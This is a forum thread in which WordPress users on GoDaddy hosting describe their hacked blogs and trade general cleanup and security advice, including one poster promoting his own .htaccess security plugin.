Godaddy wordpress blog hacked

if you respond to this post please dont redirect me to a link where i can get help. thats not cool

just type the steps here in this forum

1
2
3
4
5
6

( i just want to say whoever is responsible for this hack or virus – you could do well with your skills and help improve people lives and not make life frustrating for people. maybe you should look in the mirror and tell yourself you are a good person and do good things with your skills….. ) try it!

this is the email i received – i took out the phone number because i have no clue if this is a fake or real.. and i dont want to guide someone into a further trap of hell!!

We are sending you this message because you may not be using the current version of WordPress.

Many outdated versions of WordPress have been affected by malware. For the security of your site, it is important that you install the latest version of WordPress as soon as possible.

While it’s convenient, the quick upgrade feature in WordPress and in Hosting Connections does not remove old files. We recommend a more thorough backup and upgrade.

Please follow these detailed instructions to upgrade your version of WordPress and protect your site.

We appreciate your attention on this critical issue. We are here to help if you have difficulty with the update/upgrade installations. While this “exploitation” is not unique to WordPress or Chadle, it has impacted some of our shared hosting customers and we are making every effort to “spread the word about the fix.” Our goal is to help you keep your website safe and secure. If you have questions, please call us 24/7 at .

Sincerely,

Hosting Security Team

@helpme11
GoDaddy.com did send out a notification to customers affected by this issue. Although I know you would prefer not to be linked, I want to avoid flooding the forum. For a step-by-step guide to update WordPress, please visit https://fwd4.me/NGN

Alicia

can someone from wordpress please respond to how can i fix my dashboard so i can continue with my blog posting..

my post dashboard and
comment dashboard is messed up

@helpme11: Could you please stick to the one topic!

https://www.ads-software.com/support/topic/396524/page/2?replies=37

@Hulbert (& everyone else in the same boat)–

that looks like the same infection, so if you haven’t done so already, restoring to a backup from before you were hit would still work. then make sure you’ve got the right permissions and everything else set up (for what it’s worth, though it doesn’t seem to be doing much in terms of prevention for some people).

this post on sucuri.net has a script you can run that might make things a little easier (especially if you keep getting hit by the same thing): https://blog.sucuri.net/2010/05/simple-cleanup-solution-for-latest.html

https://wpsecuritylock.com has been posting pretty regular updates on all the attacks with complete steps for recovering your site as well.

@derekbanas — looks like your site was hit by the latest wave https://www.wpsecuritylock.com/breaking-news-wordpress-hacked-with-zettapetta-on-dreamhost/

NOTE: If you suspect your WordPress site has been affected by a security issue, we recommend upgrading your WordPress installation.

i already had an upgraded version.

so should i do it again? and upgrade.

well i did. i upgraded

and i still have a messed up dashboard.

what can i do? please

i just had a thought. why would someone want to hack our websites. so pointless. what do they gain from it?

im still waiting for a reply. i wish i was getting a notification everytime there is a reply so i dont have to keep refreshing the page to see if someone replied.

omg

Upgrading after you have been hacked does nothing. It’s putting a band-aid on a gangrenous leg.

Sanitize your site and your database first.

Second, close the holes that have nothing to do with wordpress, such as:
1) Crappy passwords and sloppy habits
2) Incorrect file permissions and ownership
3) Infected and neglected PC’s on your home network used to upload files to your web space
4) Neglecting or ignoring security updates and a lack of regard for learning the basics about caring for a web space
5) Stop storing FTP and other login credentials in every desktop application that will store them.

why would someone want to hack our websites. so pointless. what do they gain from it?

Not pointless at all. “They” want to control your web space for their own use because it’s weak and exploitable for some reason. “They” don’t care who you are, and “They” are usually robots and scripts. The human factor is a very distant endpoint in most cases.

You can start by following and reading the information in the links you find listed here:

https://www.ads-software.com/support/topic/396449?replies=8#post-1506407

You can also post a link to one of your hacked sites, and someone (if they dare visit your site) might be able to provide you more info on the “how”, or “why” aspect of the problem.

This is what my friend wrote to me:

look at wp-content/themes/sem-reloaded/ (anything with that datestamp
me: where do i go to see that ..
friend: You’ll see base 64 code at the top of each script. It’s all been hacked.
ftp
It’s not part of WP.
use an FTP client to get to your server

Go here, read this, try the fix. Help others by reporting back with the results.

https://www.ads-software.com/support/topic/396524/page/2?replies=47#post-1506618

Hmm. Your web host is responsible only up to a certain degree for providing security for your website and then the actual owner is then responsible for his or her own personal website security. I see someone mentioned checking file and folder permissions to make sure they are set correctly. And I see someone else mentioned protecting and securing documents that contain passwords and account info. I also see several other very good procedures and practices that everyone should follow to ensure their own personal website security.

This is going to seem like self promotion and I guess it is a little bit, but believe it or not I actually really genuinely care and like offering help whenever possible. So anyway I had a client that was hacked on GD a couple of months ago because they had custom coding (it was dirty code) that was being exploited by an XSS script attack. The client had an HTML site and a WordPress website that was being hacked. I came across some .htaccess code that filters and blocks XSS and SQL injection hacking attacks. I then went on to make a simple WordPress plugin to automate handling the .htaccess files simple and easy and added a maintenance mode for my own personal use as a website developer. WordPress is very secure already, but if you leave any doors open, trust me a hacker will be camping in your website living room before you have a chance to blink. I’m going to say it again WordPress is already very secure, but if you want an extra level of protection against XSS or SQL injection hacks then check out the BulletProof Security plugin. It’s very simple and very effective. I have tested it in the most hacker infested waters with open website wounds clearly exposed for hackers to see and so far so good. Zero XSS or SQL injection hacked websites that are now using BulletProof Security. Yeah I’m plugging my own plugin LOL. I’m offering some help so take it or leave it. There is nothing that sucks more than having to clean up a website that has been hacked. Ugh.

Whether or not you use the plugin, one thing that should be standard for any website is an .htaccess file that actually provides security for your website.

My blog has been infected 4 times in as many weeks. I run a php script to clean every files on my end and then reinstall wordpress, my theme and all plugins. I change my WordPress key, passwords, FTP password, MySQL password. And it still keeps coming back! And yes, I have GoDaddy! Those people lost a customer.